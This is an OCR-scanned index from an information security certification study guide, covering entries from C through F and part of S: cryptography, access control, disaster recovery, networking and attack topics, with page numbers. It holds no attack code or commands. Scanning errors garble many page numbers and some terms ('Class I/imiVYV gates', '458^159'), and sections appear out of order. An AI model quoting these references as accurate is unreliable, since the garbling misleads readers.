Charged Couple Discharge cameras. See CCD 
cameras 
Checklists 

Disaster Recovery Plans, 418 
exam readiness, 4 
Chief Executive Officers. See CEO 
Chief Financial Officers. See CFO 
Chief Information Officers. See CIO 
Chief Operating Officers. See COO 
Chinese Wall model of access control, 109 
Chosen ciphertext attacks, 173-174 
Chosen plaintext attacks, 173 
CIA triad (confidentiality, integrity and 
availability), 12-15 
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CIB (Candidate Information Bulletin), 2 
CIDR (Classless Inter-Domain Routing), 23 1 , 
232-233 

CIO (Chief Information Officers), BCP/DRP 
development, 395-397 
Cipher Block Chaining. See CBC 
Cipher Block Chaining Message Authentication 
Codes. See CBC-MAC 
Cipher disks, 151-153 
Cipher Feedback. See CFB 
Ciphers 

AES, 165-168, 181,262 
Bluetooth, 262 
definition, 146 
DES, 161-165, 181 

hash functions, 103, 170-171, 176-178, 181, 
296-300 

historical, 150-159 
IDEA, 165 

monoalphabetic, 148, 150-151 
poly alphabetic, 148, 151-153 
WEP, 261 
Ciphertext 

attacks, 173-174 
definition, 146 

Circuit-level proxy firewalls, 274 
Circuit-switched networks, 221 
Circumstantial evidence, 25 
CIRT (Computer Incident Response Teams), 

19, 358 

CISC (Complex Instruction Set Computers), 
122-123 

CIS security benchmarks, 64-65 

Civil law, 20, 22-23 

Clark-Wilson integrity model, 108-109 

Classes of fires and suppression agents, 205-207 

Classes of gates, 184 

Classful networks/addresses, 232 

Class I/imiVYV gates, 184 

Classifications, data security, 82-85 

Classless Inter-Domain Routing. See CIDR 

Clearance, 83 

C-level management, 395-397, 411-412 
Client-side attacks, 140 
Clipper Chips, 1 82 
Clipping levels, passwords, 295-296 
Closed Circuit Television. See CCTV 
Closed source software, 435 
Closed systems, design concepts, 119 
Cloud services, 132-134, 312-313 
CMM (Capability Maturity Model), 430, 462, 
466-467 

CMP (Crisis Management Plans), 409-41 1 


CM Plans (Configuration Management Plans), 450 
CMS (Content Management Systems), 449^150 
Coaxial cable, 202, 247 

COBIT (Control Objectives for Information and 
Related Technology) framework, 95 
CO 2 (Carbon Dioxide), fire suppression, 208 
CoCom (The Coordinating Committee for 

Multilateral Export Controls), 39, 160 
Codebooks, 154-155 

Cohesion, Object-Orientated Programming, 
458^159 

Cold boot attacks, 88 
Cold sites, 406 

Collection limitation principle, 37 
Collisions 
Ethernet, 248-249 
hash functions, 170-171 
Collusion, 347 

Color of law enforcement, 28-29 
Combination locks, 190 
Combinatorial testing of software, 338 
COM (Component Object Model), 460 
Commandments of Computer Ethics, 48 
Commercial Off-the-Shelf software. See COTS 
Commit, databases, 455 
Common Body of Knowledge. See CBK 
the Common Criteria. See International 
Common Criteria 
Common law, 2 1 

Common Object Request Broker Architecture. 

See CORBA 

Communications, 277-287 
analog, 221 

authentication protocols and frameworks, 
278-280 

Content Distribution Networks, 287 

continuity of operations, 404-405 

covert channels, 109-1 10 

Crisis Management Plans, 409 — 41 1 

digital fundamentals, 220-221 

disaster recovery, 393 

exam objectives summary, 287-288 

failures, 391-392 

IRC, 285 

multiplexing, 260 

remote access, 282-287 

remote meeting technology, 286 

remote wipe, 286 

risk assessment, 394 

security, 277-288 

self-tests, 288-290, 494^199 

telecommunications management, 404-405 

telecommuting, 282-287 
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unlicensed bands, 259 
VPN, 280-282 

Compact Discs - Recordable. See CD-Rs 
Compartmentalization 

information security, 82-83 
security domains, 113, 117 
United States, 82-83 
Compensating controls, concepts, 57 
Compensatory financial damages, 23 
Compilers, 43 1 

Complete business interruption testing, 419 
Complex Instruction Set Computers. See CISC 
Complexity 
abstraction, 1 17 

passwords and passphrases, 295 
Compliance, 20-23 
Component Object Model. See COM 
Components, program policies, 49-50 
Computer-Aided Software Engineering. 

See CASE 

Computer based testing. See CBT 
Computer bus, design, 119-120 
Computer crime. See Cybercrimes; Individual 
forms of attacks... 

Computer Ethics Institute, 48 
Computer Fraud and Abuse Act - Title 1 8 Section 
1030, 40,41-42 

Computer Incident Response Teams. See CIRT 
Computer Security Incident Response Teams. 

See CSIRT 

Computer viruses, 137-138 
Conficker worm, 58-59, 139 
Confidentiality 
breaches, 84 

code repository history, 448 
cornerstone concepts, 12-15 
cryptography, 146-147 
databases, 45 1 
definition, 1 1 

HIPAA, 14, 40, 42-43, 54-55, 97 
memory protection, 123-126 
penetration testing, 331-332 
privacy laws, 36-38 
trusted platform modules, 126 
Confidential object labeling, 82 
Configuration Control Boards. See CCB 
Configuration issues 
change management, 449-450 
security operations, 371-373 
site design, 197-199 

Configuration Management Plans. See CM Plans 
Conflicts of interest, Chinese Wall model, 109 
Confusion, cryptography, 147 


Congestion Window Reduced flags. See CWR 
Connections, maintenance, OSI model, 224 
Consistency testing, 418 
Constrained data items. See CDI 
Constrained user interfaces, databases, 453 
Consultants, security issues, 53-54 
Contactless cards, access control, 191, 262-263 
Containment phase, incident responses, 361 
Contaminants, airborne, 203 
Content-dependent access control, 323 
Content Distribution Networks. See CDN 
Content Management Systems. See CMS 
Context-dependent access control, 323 
Continuity of operations 
backup storage, 84-86, 97-98, 376-381, 
412-417, 456 

BS-25999 standards, 422-423 

Business Continuity Planning, 383-424 

Business Impact Analysis, 399—403 

call trees, 409-411, 420 

change management, 420 

continued maintenance, 420—421 

COOP, 407-408 

critical resources, 385 

critical state assessment, 398-399 

Disaster Recovery Planning, 383-424 

disasters or disruptive events, 385-392 

Executive Succession Planning, 411-412 

failure and recovery metrics, 401-403 

fault tolerance, 376-382 

frameworks, 421—423 

Good Practice Guide, 423 

Highly Available clusters, 382, 416 

incident response management, 357-363 

ISO 22301 guidelines, 422^123 

ISO/IEC-27031 guidelines, 422-423 

mobile sites, 407 

NIST SP, 800-34 , 422 

plan approval, 412 

principles, 383-384 

project initiation, 395-398 

reciprocal agreements, 406-407 

recovery strategy development, 403—407 

secondary sites, 405—407 

security operations, 375-424 

Service Level Agreements, 44, 375-376 

subscription services, 407 

supply chain management, 403—404 

system redundancy, 382, 405—406 

telecommunications management, 404—405 

utilities management, 405 

version control, 421 

vital records storage, 41 1 
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Continuity of Operations Plans. See COOP 
Continuity Planning Project Teams. See CPPT 
Continuity of Support Plans, 408 
Continuous monitoring, security operations, 367 
Contraband checks, 193 
Contractors, security issues, 53-54 
Contractual security, service providers, 44-45 
Control of access, 293-327. See also Access control 
Control frameworks 
databases, 144 
data security, 93-96 

Control Objectives for Information and Related 
Technology framework. See COBIT 
framework 

Control technologies, access management, 309-320 
Control unit. See CU 
Convention on Cybercrime, 38 
Converged protocols, networks, 256-258 
Convergence, routing, 268 
COO (Chief Operating Officers), BCP/DRP 
development, 395-397 

COOP (Continuity of Operations Plans), 347, 
384-385, 407-408 

The Coordinating Committee for Multilateral 
Export Controls. See CoCom 
Copyright, 32-36. See also Intellectual property; 
Licenses 

CORBA (Common Object Request Broker 
Architecture), 460^4-61 
Core keys, 188-190 
Cornerstone concepts 

confidentiality, integrity and availability, 12-15 
cryptography, 146-150 
disclosure, alteration and destruction, 13-14 
identity and authentication, authorization and 
accountability, 15-18 
Object-Orientated Programming, 457-458 
security, 12-19 
Corrective controls, 56 
Corroborative evidence, 25-26 
Corrosion, environmental control, 203 
Cosmic compartmented information, NATO, 83 
Cost approach to asset valuation, 61 
COTS (Commercial Off-the-Shelf) software, 
security impacts, 468-469 
Council of Europe Convention on Cybercrime, 38 
Count-down timers, gas fire suppression systems, 209 
Counter-based synchronous dynamic tokens, 303 
Countermeasures 

mobile device attacks, 145-146 
security engineering, 145-146 
Counter Mode. See CTR 


Counter Mode CBC MAC Protocol. See CCMP 
Coupling, Object-Orientated Programming, 
458^159 

Covert channels, 109-110, 136-137 
CPPT (Continuity Planning Project Teams), 

397- 398 

CPUs (Central Processing Units) 
architecture, 120-123 
cache, 87-88 
FDX process, 121 
instruction sets, 122-123 
interrupts, 121 
machine code, 430-43 1 
memory addressing, 123 
multitasking and multiprocessing, 122 
pipelining, 121 

processes and threads, 121-122 
rings, 117-118 
watchdog timers, 122 
Crackers, 69 

Cracking passwords, 296-300 
Crashes, watchdog timers, 122 
Credential management systems, 313 
Credentials, KERBEROS, 315-318 
Crime, site selection, 197 
Criminal law, 22 
Crippleware, 435 

Crisis Communications Plans, 409 
Crisis Management Plans. See CMP 
Critical assets 

BCP/DRP development, 398-399, 400 
Business Impact Analysis, 400 
vital records storage, 411 
Critical processes, watchdog timers, 122 
Critical resources 

Business Continuity Planning, 385 
disaster recovery, 393 

Critical state assessment, BCP/DRP development, 

398- 399, 400 

CRL (Certificate Revocation Lists), PKI, 178 
Crossover, Genetic Algorithms, 472 
Crossover Error Rate. See CER 
Cross-Site Request Forgery. See CSRF; See also 
XSRF 

Cross-Site Scripting. See XSS 
Crosstalk, 201-202 
Cryptanalysis, 146, 171-176, 299-300 
Cryptographic strength, 148 
Cryptographic technologies 
data in motion, 96-97, 149, 277-282 
import/export restrictions, 39 
trusted platform modules, 126 
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AES, 165-168, 181,262 
asymmetric encryption, 168-170 
attacks, 171-176 

confidentiality, integrity, authentication and non- 
repudiation, 146-147 
confusion, diffusion, substitution and 
permutation, 147 
cornerstone concepts, 146-150 
data at rest and in motion, 96-97, 149, 

277-282 

DES, 161-165, 181 
digital signatures, 176-177 
Digital Watermarks, 183 
escrowed encryption, 181-182 
hash functions, 103, 170-171, 176-178, 181, 
296-300 

historical ciphers, 150-159 
history, 150-160 
IDEA, 165 

implementation, 176-183 

IPSEC, 179-181 

key terms, 146 

laws, 159-160 

MAC, 177-178 

modular maths, 148 

monoalphabetic ciphers, 148, 150-151 

PGP, 181 

PKI, 178-179, 181 

polyalphabetic ciphers, 148, 151-153 
prime number factoring, 168-169 
protocol governance, 149-150 
security engineering, 146-183 
SSL and TLS, 179, 280, 282, 286 
steganography, 182-183 
strength, 147 

symmetric encryption, 160-168 
types, 160-171 
WEP, 261 

XOR, 149. See also Cryptanalysis 
Cryptology 

definition, 146. See also Cryptanalysis; 
Cryptography 

CSIRT (Computer Security Incident Response 
Teams), 358 

CSMA (Carrier Sense Multiple Access), 219, 
248-249 

CSMA/CD (Carrier Sense Multiple Access with 
Collision Detection), 249 
CSRF (Cross-Site Request Forgery), 465 
CSU/DSU (Channel Service Unit/Data 
Service Unit), 277 
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CU (control unit), CPUs, 120 

Custodians, information security, 86 

Customary law, 2 1 , 24 

Custom-developed third party products, security 
impacts, 469 

CWR (Congestion Window Reduced) 
flags, 238 

Cybercrimes 

attribution, 31, 38 
evidence integrity, 27, 29, 297 
financially motivated attackers, 390 
honeypots & honeynets, 370-37 1 
international cooperation, 38. See also 

Hackers; Individual forms of attacks...'. 
Vulnerabilities 

Cyber Incident Response Plans, 409 

Cybersquatting, 35-36 
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DAC (Discretionary Access Control), 293, 
321,349 

DAD triad (disclosure, alteration and destruction), 
13-14 

DARPA (Defense Advanced Research Projects 
Agency), 221-222 

Data 

analytics, 144-145 
breach notification laws, 43 
destruction, 90-92 

differential backups, 377-378, 414^115 

exfiltration prevention, 193 

fault tolerance, 376-382 

full backups, 377,414 

Full-Disk Encryption, 96-97, 126, 149, 370 

hardcopy records, 413—414 

incremental backups, 377, 414 

labels, 82 

overwriting, 91 

ownership, 85-87 

privacy, 36-38 

remanence, 81, 87-89, 91 

remote wipe, 286 

retention, 357 

security classifications, 82-85 
SSD writing method, 90 
subjects and objects, 18 
trans-border flows, 38, 39. See also Integrity; 
Objects 

Database Administrators. See DBAs 

Database Management System. See DBMS 


568 Index 


Databases 
backups, 456 
confidentiality, 45 1 
constrained user interfaces, 453 
development, 450-456 
hierarchical, 451, 454-455 
inference and aggregation, 143-144, 451 
integrity, 455 
journals, 455 
meta-data, 453 
mining, 144, 456 
normalization, 453 
object-orientated, 451, 455 
poly instantiation, 143 
query languages, 451, 453-454 
relational, 451^-53 
remote journaling, 415 
replication and shadowing, 415, 455-456 
security engineering, 142-145 
types, 45 1 — 455 
views, 453 
warehousing, 456 
Database schemas, 453 
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388-389 

Data Circuit-Terminating Equipment. See DCE 

Data collection limitations, 86-87 

Data controllers, 86 

Data Define Language. See DDL 

Data dictionaries, 453 

Data Encryption Algorithm. See DEA 

Data Encryption Standard. See DES 

Data Execution Prevention. See DEP 

Data hiding. See Encapsulation 

Data integrity. See Integrity 

Data Link Layer (Layer 2), 223, 236-237, 263-266 

Data Loss Prevention. See DLP 

Data Manipulation Language. See DML 

Data mining, 144, 456 

Data in motion, 96, 277-287 

authentication protocols and frameworks, 278-280 
protection, 98, 149, 277-283 
remote access, 282-287 
VPN, 280-282 
Data Owners, 85-86 
Data points, fingerprint scans, 305 
Data Processors, 86 
Data Quality principles, 37 
Data remanence. See Remanence 
Data at rest, 96-97, 149 
Data security controls, 92-98 

accreditation and certification, 92-93 
in motion and at rest, 96-98, 149, 277-287 


scoping and tailoring, 96 
standards and frameworks, 93-96 
Data Service Unit. See DSU 
Data Terminal Equipment. See DTE 
Data Terminal Equipment/Data Circuit-Terminating 
Equipment. See DTE/DCE 
Data warehousing, 456 
DBAs (Database Administrators), 45 1 
DBMS (Database Management System), 450-451, 
455-456 

DC (Domain Controllers), 296 

DCE (Data Circuit-Terminating Equipment), 277 

DCOM (Distributed Component Object Model), 460 

DDL (Data Define Language), 453^454 

DDoS (Distributed Denial of Service) attacks, 72 

De-acquisitions, security issues, 46 

DEA (Data Encryption Algorithm) 

AES, 165-168, 181,262 
DES, 161-165 
IDEA, 165 
Deadbolts, 188-189 
Decentralized access control, 309-310 
Declaration on Transborder Data Flows, 39 
Decode instructions, CPUs, 121 
Decryption 

definition, 146. See also Cryptanalysis; 
Cryptography 

Dedicated mode of operation, 112 

Default routes, LANs, 267 

Defense Advanced Research Projects Agency. 

See DARPA 

Defense-in-Depth, 19, 145 
asset tracking, 199 
contraband checks, 193 
dogs, 195-196 
EAP, 279-280 
guards, 195 

honeypots & honeynets, 370-37 1 
media destruction, 92 
networks, 220, 271-277 
perimeter defenses, 183-196 
port controls, 199-200 
restricted areas and escorts, 196 
server- side attacks, 139-140 
system defenses, 199-200 
Defensive categories, access control, 55-58 
Defined, CMM Phase, 3, 467 
Degaussing, 89, 91 
Deletion of files, remanence, 9 1 
Deluge sprinkler systems, 211 
Demarc, 277 

De-mergers, security issues, 46 
Demilitarized Zone. See DMZ 
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De-multiplexing, TCP/IP model, 226 
Denial of Service attacks. See DoS 
Density, data centers, 388-389 
DEP (Data Execution Prevention), 126-127 
Deployment of patches, 372 
Depth of field, CCTV, 185-186 
DES (Data Encryption Standard), 161-165, 181 
Design concepts 
abstraction, 117 
cloud computing, 132-134 
countermeasures, 145-146 
CPUs, 120-123 
databases, 142-145 
Data Execution Prevention, 126-127 
large-scale parallel data systems, 134 
layering, 116-118 
memory protection, 123-126 
motherboards, 119-120 
networks, 220-263 
open and closed systems, 119 
P2P networks, 134-135 
ring model, 117-118 
secure hardware architecture, 119-127 
secure operating system and software 
architecture, 127-131 
secure systems, 116-119 
thin clients, 135 
trusted platform modules, 126 
virtualization, 131-132 
WORM storage, 126 
Desktop virtualization, 284-285 
Destruction 

cornerstone concepts, 13-14 
data, 90-92 

Detection phase, incident responses, 360 
Detective controls, 56, 57, 363-371 
Anomaly Detection IDS, 366 
HIDS, 365 
NIDS, 364-365 
Pattern Matching IDS, 366 
Protocol Behavior IDS, 366 
Deterrent controls, concepts, 56-57, 58 
Development 

software, 429-477 
acceptance testing, 467—468 
Agile methods, 439-441 
APIs, 449 

Artificial Intelligence, 469-472 

Capability Maturity Model, 430, 462, 466-467 

code repositories, 448 

databases, 450-456 

exam objectives summary, 473 

Extreme Programming, 429, 441 


Genetic Algorithms, 472 
methods, 436-450 

Object-Orientated Analysis and Design, 
461-462 

Object-Orientated Programming, 456—461 
programming concepts, 430^136 
prototyping, 442-443 
Rapid Application Development, 442 
Sashimi Model, 438-440 
Scrum, 440-441 
security effectiveness, 462-469 
self test, 473-475,515-520 
Spiral Model, 429, 441-442 
Systems Development Life Cycle, 429, 
443^47 

vulnerabilities, 462-466 
Waterfall Model, 429, 436-439 
Device drivers, ring model, 118 
DevOps, 450 

DF (do not fragment) flags, IPv4, 229 
DHCP (Dynamic Host Configuration Protocol), 

135, 231,245 
Diameter, 279-280, 319 
Dictionary attacks, 297-299 
Differential backups, 377-378, 414-415 
Differential cryptanalysis, 174-175 
Diffie-Hellman Key Agreement Protocol, 169 
Diffusion, cryptography, 147 
Digital communications, fundamental concepts, 221 
Digital forensics, security operations, 352-357 
Digital signatures, cryptography, 176-177 
Digital Subscriber Line. See DSL 
Digital Video Recorders. See DVR 
Digital Watermarks, implementation, 183 
Diligence 

concepts, 19. See also Due diligence 
Dilution of trademarks, 35 
Directed broadcast addresses, 236 
Direct evidence, concept, 25 
Direct mode, memory addressing, 123 
Directory Path Traversal, 463 
Direct Sequence Spread Spectrum. See DSSS 
Disabling 

autorun, 369-370 
IPv6 services, 232-233 
Disassemblers, 43 1 
Disaster, definition, 347 
Disaster Recovery Planning. See DRP 
Disasters 

Business Impact Analysis, 399—403 
environmental, 386-387, 388-389 
human, 386-387 
natural, 386-388 
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Disciplinary processes, 17, 53 
Disclosure 

cornerstone concepts, 13-14 
software vulnerabilities, 466 
Disclosure, Alteration and Destruction. See 
DAD triad 

Discrete logarithms, asymmetric encryption, 169 
Discretionary Access Control. See DAC 
Disease, personnel shortages, 390-391 
Diskless workstations, principles, 135 
Disks 

ciphers, 151-153 
degaussing, 91 
encryption, 96-97 
forensic analysis, 353-355 
Full-Disk Encryption, 96-97, 126, 149, 370 
hashing for authenticity validation, 297 
RAID, 378-381 
reformatting, 91 
remanence, 81, 87-89, 91 
SSDs, 81, 89-90. See also Media 
Disruptive events 

Business Impact Analysis, 399—403 
communications failures, 391-392 
disaster classifications, 386-387 
electrical/power problems, 388-389 
environmental failures, 388-389 
errors and omissions, 387 
financially motivated attackers, 390 
natural disasters, 386-388 
personnel shortages, 390-391 
types, 385-392 

warfare, terrorism and sabotage, 389 
Distance Vector Routing Protocols, 269-27 1 
Distributed access control. See Decentralized 
access control 

Distributed Component Object Model. 

See DCOM 

Distributed Denial of Service attacks. 

See DDoS 

Distributed Network Protocol. See DNP3 
Divestitures, security, 46 
DLP (Data Loss Prevention), 367-368 
DML (Data Manipulation Language), 453-454 
DMZ (Demilitarized Zone), 276 
DNP3 (Distributed Network Protocol), 256 
DNS (Domain Name System), 244 
DNSSEC (Domain Name Server Security 
Extensions), 244 

Documentation, security policies, 49-52 
DoD (U.S. Department of Defense), 221 
Dogs as a defense, 195-196 


Domain, 1, 1 1-80. See also Risk management; 
Security 

Domain, 2, 81-102. See also Asset Security 
Domain, 3, 103-217. See also Security engineering 
Domain, 4, 219-293. See also Communications; 
Networks 

Domain, 5, 293-327. See also IAM (Identity and 
Access Management) 

Domain, 6, 329-345. See also Security assessment 
and testing 

Domain, 7, 347-428. See also Security operations 
Domain, 8, 429-477. See also Software, 
development 

Domain Controllers. See DC 
Domain Name Server Security Extensions. See 
DNSSEC 

Domain Name System. See DNS 
Domains, security, 117 
Do not fragment flags. See DF 
Doors, security, 194 

DoS (Denial of Service) attacks, 14, 72, 259 
Double-interlock sprinkler systems, 21 1 
Drag & drop questions, 5-7 
Drains, HVAC, 202 

DRAM (Dynamic Random Access Memory), 88 
Drills 

Disaster Recovery Plans, 418 
evacuations, 204-205 
Drives. See Disks; See also Media 
DRP (Disaster Recovery Planning), 348, 383-424 
awareness, 420 
backup availability, 4 1 2—4 1 7 
Business Impact Analysis, 399—403 
call trees, 409^-1 1, 420 
change management, 420 
continued maintenance, 420—421 
Crisis Management Plans, 409—41 1 
critical state assessment, 398-399 
development of approach, 394—412 
Executive Succession Planning, 411-412 
failure and recovery metrics, 401-403 
frameworks, 421-423 
mistakes, 421 
plan approval, 412 
principles, 384 

process instantiation, 392-393 
project initiation, 395-398 
reciprocal agreements, 406—407 
related plans, 407-412 
relationship with BCP, 384-385 
reviews, 417-418 
scoping, 398 
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secondary sites, 405-407 
strategy development, 403-407 
subscription services, 407 
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testing, 417—419 
training, 419^-20 
version control, 42 1 
vital records storage, 41 1 
Dry pipe sprinkler systems, 210-21 1 
Dry powder, fire suppression, 208 
DSL (Digital Subscriber Line), properties, 283 
DSSS (Direct Sequence Spread Spectrum), 
WLANs, 259-260 
DSU (Data Service Unit), 277 
DTE (Data Terminal Equipment), 277 
DTE/DCE (Data Terminal Equipment/Data 
Circuit-Terminating Equipment), 277 
Dual-factor authentication. See Strong 
authentication 
Dual-homed hosts, 275 
Dual stack systems, TCP/IP, 23 1 
Due care, 19, 24 
Due diligence, 19, 24, 45^-6 
Dumpster diving, 90-91, 92 
Duress warning systems, 204-205 
Duties 

rotation, 350-351 
separation, 108-109, 349-350 
DVR (Digital Video Recorders), 185 
Dynamic Host Configuration Protocol. See DHCP 
Dynamic NAT, 234-235 
Dynamic passwords, 295 
Dynamic Random Access Memory. See DRAM 
Dynamic signatures, 308 
Dynamic testing of software, 335-336 
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E1/E3 circuits, 254 

EAL (Evaluation Assurance Levels), ICC, 116 
EAP (Extensible Authorization Protocol), 278-280 
EAP-FAST (EAP-Flexible Authentication via 
Secure Tunneling), 280 
EAP-MD5, 280 
EAPOL (EAP Over LAN), 279 
EAP-TLS (EAP-Transport Layer Security), 280 
EAP-TTLS (EAP-Tunneled Transport Layer 
Security), 280 

Earthquake Disaster Risk Index, 59-60 
ECB (Electronic Code Book), DES, 161-162 
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flags, 238 
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ECPA (Electronic Communications Privacy 
Act), 40 

EDE (Encrypt, Decrypt, Encrypt), Triple DES, 164 
eDISCOVERY (Electronic Discovery), 357 
EEPROM (Electronically Erasable Programmable 
Read Only Memory), 88-90 
EER (Equal Error Rates), biometrics, 305-306 
EES (Escrowed Encryption Standard), 182 
EF (Exposure Factors), risk analysis, 62, 63 
EGPs (Exterior Gateway Protocols), 268-269 
Egyptian Hieroglyphics, 150 
Electricity 

disruptive events, 388-389 
emergency power training, 419 
environmental controls, 200-202 
faults, 200, 388-389 
generators, 197, 201, 419 
redundant supplies, 38 
UPSs, 197, 201,388-389 
Electromagnetic emanations. See Emanations 
Electromagnetic Interference. See EMI 
Electromagnetic spectrum, bands, 259 
Electronically Erasable Programmable Read Only 
Memory. See EEPROM 
Electronically stored information. See ESI 
Electronic backups. See Backup storage 
Electronic Code Book. See ECB 
Electronic Communications Privacy Act. 

See ECPA 

Electronic Discovery. See eDISCOVERY 
Electronic Protected Health Information. 

See ePHI 

Electronic vaulting, 415 
Elliptic Curve Cryptography, 169 
Emanations, 136 

Embedded device forensic analysis, 356-357 
Emergency Operations Centers. See EOC 
Emergency power 

technology, 197, 201, 388-389 
training requirements, 419 
EMI (Electromagnetic Interference), 201-202, 
245-246, 263 
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background checks, 52-53 
disaster recovery training and awareness, 
419-420 

disciplinary processes, 17, 53 
Encapsulating Security Payload. See ESP 
Encapsulation 

Object- Orientated Programming, 457 
TCP/IP model, 226 
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Encryption 

AES, 165-168, 181,262 
asymmetric, 103, 168-170 
cold boot attacks, 88 
cornerstone concepts, 146-150 
definition, 146 
DES, 161-165, 181 
digital signatures, 176-177 
Digital Watermarks, 183 
disks, security operations, 370 
drives and tapes, 96-97 
escrowed, 181-182 

hash functions, 103, 170-171, 176-178, 181, 
296-300 
IDEA, 165 
IPSEC, 179-181 
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PGP, 181 
PKI, 178-179 

prime number factoring, 168-169 
security engineering, 146-183 
SSL and TLS, 179, 280, 282, 286 
steganography, 182-183 
symmetric, 104, 160-168 
trusted platform modules, 126 
WEP, 261. See also Cryptography 
Encryption order, triple DES, 164-165 
Endpoint security, 368-370 
End-to-end encryption, 98 
End-user license agreements. See EULA 
Enforcement 

accountability, 16-17 
Clark-Wilson, 108-109 
Engineering, security. See Security engineering 
English letters, frequency, 148 
Enigma Machines, 157 
Enrollment, biometrics, 304 
Enterprise Architecture, 111, 126 
Enticement, concepts, 30 
Entitlements, 311-312. See also Authorization 
Entity integrity, relational databases, 452 
Entrapment, 30 
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electricity, 200-202 

heat, smoke and flame detectors, 203-204 
HVAC, 202-203, 386-387 
personnel safety, training and awareness, 
204-205 

Environmental disasters, types, 386-387 

EOC (Emergency Operations Centers), 41 1 

Ephemeral ports, TCP, 237-238 

ePHI (Electronic Protected Health Information), 97 


EPROM (Erasable Programmable Read Only 
Memory), 88-89 
Equal Error Rates. See EER 
Eradication phase, incident response 
management, 361 

Erasable Programmable Read Only Memory. 
See EPROM 
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human, 387 

software development, 462-463 
Escorts, restricted areas, 196 
Escrow, software, 416^117, 447 
Escrowed encryption, implementation, 181-182 
Escrowed Encryption Standard. See EES 
ESI (electronically stored information), 
eDISCOVERY, 357 

ESP (Encapsulating Security Payload), IPsec, 
179-181,281-282 
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CSMA, 219, 248-249 
FCoE, 256-257 
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types, 248 
Ethics, 46-49, 69 
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Convention on Cybercrime, 38 
data privacy laws, 36-38 
Data Protection Directive, 36-38 
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ITSEC, 114-115 

EUI-64 (Extended Unique Identifiers), 227 
EULA (end-user license agreements), 34, 435 
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Evacuations, 204-205 

Evaluation, real-world system security, 113-115 
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disasters and disruptive, 385-392. See also 
BCP; DRP 
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burden of proof, 22-23 
chain of custody, 27, 29 
concepts, 25-27 
integrity, 27, 29, 297 
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reasonable searches, 27-30 
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after, 9 

computer based testing, 5 
drag & drop questions, 5-7 
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scenario questions, 5 
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access control, 324-326, 499-504 
asset security, 98-100, 484-489 
communications, 288-290, 494^-99 
Identity and Access Management, 324-326, 
499-504 

network design, 288-290, 494-499 
security assessment and testing, 340-344, 
504-510 

security engineering, 212-215, 489—494 
security operations, 424—426, 510-515 
security and risk management, 74-78, 

479-484 

software development, 473-475, 515-520 
taking the test, 4-9 
three pass method, 9 
two pass method, 8-9 
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Execute functions, CPUs, 121 
Executive Succession Planning, 41 1-412 
Exfiltration prevention, 193 
Exigent circumstances, reasonable searches, 27-30 
Expert systems, 469—470 

Explicit Congestion Notification Echo flags. See ECE 
Exposure Factors. See EF 
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Extensible Authorization Protocol. See EAP 
Extensible Authorization Protocol-Flexible 

Authentication via Secure Tunneling. See 
EAP-FAST 

Extensible Authorization Protocol Over LAN. See 
EAPOLEAP 

Extensible Authorization Protocol-Transport Layer 
Security. See EAP-TLS 
Extensible Authorization Protocol-Tunneled 

Transport Layer Security. See EAP-TTLS 
Extensible Markup Language. See XML 
Extensions, copyright terms, 33 
Exterior Gateway Protocols. See EGPs 
External auditors, access control security, 333 
Extranets, fundamental concepts, 221 
Extreme Programming. See XP 
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Facial scans, 308 
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Failure metrics, 401-403 
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Fairness, biometrics, 304 
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False Reject Rate. See FRR 

Faraday Cages, 263 

FAR (False Accept Rate), biometrics, 293, 305-306 
FAT (File Allocation Table), remanence, 91 
Faults, electrical, 200 
Fault tolerance, 376-382 
archive bits, 378 
availability of backups, 412-417 
backup storage, 376-381, 412-417 
RAID, 378-381 
star topology, 253 
system redundancy, 382, 405—406 
FCIP (Fibre Channel over IP), 257 
FCoE (Fibre Channel over Ethernet), 256-257 
FDDI (Fiber Distributed Data Interface), 249-250 
FDE (Full-Disk Encryption), 96-97, 126, 149, 370 
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Federated Identity Management. See FIdM 
Feedback, symmetric encryption, 161 
Fences, 183 
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FHSS (Frequency Hopping Spread Spectrum), 
WLANs, 259-260 

Fiber Distributed Data Interface. See FDDI 
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Fibre Channel over Ethernet. See FCoE 
Fibre Channel over IP. See FCIP 
FIdM (Federated Identity Management), 312 
Field-programmable devices, 89 
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Linux, 16-17 

need to know, 17-18, 84, 349 
File Transfer Protocol. See FTP 
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Financially motivated attacks, 390 
FIN flags, 238-239 
Fingerprint scans, 305, 306-307 
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detectors, 203-204 
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suppression, 205-21 1 
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client-side attacks, 140 
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proxy, 272-274 

screened host architecture, 275-276 
stateful, 219, 272-273 
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Flags, 229, 238-239 
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Flip-flops, RAM, 88 
Floors, design, 194-195 
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Forensics, 352-357 
eDISCOVERY, 357 
embedded devices, 356-357 
media analysis, 353-355 
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For Official Use Only. See FOUO 
FOUO (For Official Use Only), 82 
Fourth Amendment, 27-30 
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See 4GL 
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Frameworks 

access control, 3 1 8-320 
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secure communications, 278-280 
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Full backups, 377, 414 

Full disclosure of software vulnerabilities, 466 
Full Disk Encryption. See FDE 
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Fuzzing, 337-338 
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Halon and substitutes, 209 
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backup storage, 84 
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Hangs, watchdog timers, 122 
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principles, 383-384 
project initiation, 395-398 


recovery strategy development, 403—407 
related plans, 407—412 
change management, 373-375 
configuration management, 371-373 
continuity of operations, 375—424 
BCP/DRP, 383-424 
failure and recovery metrics, 401—403 
fault tolerance, 376-382 
Service Level Agreements, 44, 375-376 
system redundancy, 382, 405^106 
continuous monitoring, 367 
Data Loss Prevention, 367-368 
Disaster Recovery Planning, 383-424 
Business Impact Analysis, 399^103 
continued maintenance, 420-42 1 
Crisis Management Plans, 409-41 1 
development of approach, 394-412 
Executive Succession Planning, 411—412 
failure and recovery metrics, 401—403 
frameworks, 421-423 
principles, 384 
project initiation, 395-398 
related plans, 407-412 
strategy development, 403—407 
testing, 417 — 419 
training and awareness, 419-420 
eDISCOVERY, 357 
embedded device forensics, 356-357 
endpoint security, 368-370 
exam objectives summary, 423-424 
forensics, 352-357 
honeypots & honeynets, 370-37 1 
incident response management, 357-363 
information and event management, 366-367 
Intrusion Detection/Prevention systems, 363-366 
media forensics, 353-355 
network forensics, 356 
patch deployment, 372 
personnel controls, 348-352 
preventive and detective controls, 363-37 1 
privilege monitoring, 352 
redundancy of resources and assets, 382, 
405-406 

root cause analysis, 363 
self test, 424-426,510-515 
software forensics, 356 
vulnerability management, 372-376 
Security Parameter Index. See SPI 
* Security property, 106 
Security safeguards principles, OECD privacy 
guidelines, 37 
Security training, 52 
Seizure of evidence, 27-30 
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Selection of site, 196-197 
Semantic integrity, 452 
Semi-passive RFID tags, 262-263 
Sensitive but Unclassified. See SBU 
Sensitive Compartmented Information. See SCI 
Sensitive information/data 
Cosmic, 83 

exfiltration prevention, 193 
